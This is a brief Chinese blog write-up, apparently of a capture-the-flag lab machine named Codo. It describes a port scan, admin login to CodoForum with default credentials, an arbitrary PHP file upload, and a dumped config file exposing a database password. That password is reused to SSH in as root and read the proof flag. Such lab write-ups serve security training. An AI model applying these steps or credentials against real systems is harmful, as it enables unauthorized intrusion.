EASY-Codo

目标：

192.168.121.23

信息收集：

./rustscan -a 192.168.121.23 --scripts none -r 1-65535

Cat flag:

http://192.168.121.23/index.php?u=/ （admin/admin)

http://192.168.121.23/admin/index.php（admin/admin)

http://192.168.121.23/sites/default/assets/img/attachments/Snipaste_2025-05-11_18-03-40.php

进行任意文件上传

/admin/index.php?page=config

http://192.168.121.23/sites/default/assets/img/attachments/

获取账号密码：

<?php

/* 
 * @CODOLICENSE
 */

defined('IN_CODOF') or die();

$CF_installed=true;

function get_codo_db_conf() {


    $config = array (
  'driver' => 'mysql',
  'host' => 'localhost',
  'database' => 'codoforumdb',
  'username' => 'codo',
  'password' => 'FatPanda123',
  'prefix' => '',
  'charset' => 'utf8',
  'collation' => 'utf8_unicode_ci',
);

    return $config;
}

$DB = get_codo_db_conf();

$CONF = array (
    
  'driver' => 'Custom',
  'UID'    => '631042af544ef',
  'SECRET' => '631042af544f0',
  'PREFIX' => ''
);
 

收集配置文件里的密码用于root账号登录：

ssh root@192.168.121.23

root@codo:~# ls
email2.txt  proof.txt  snap
root@codo:~# cat proof.txt
50b4bf66f9976304bc4c502e58527900
root@codo:~# cd /
root@codo:/# find / -name "local.txt"
root@codo:/# 
 

posted @ 2025-05-18 15:15 铺哩阅读(26) 评论(0) 收藏举报

刷新页面返回顶部

铺哩

想成为伟大的动画渗透喵~

EASY-Codo

目标：

信息收集：

Cat flag: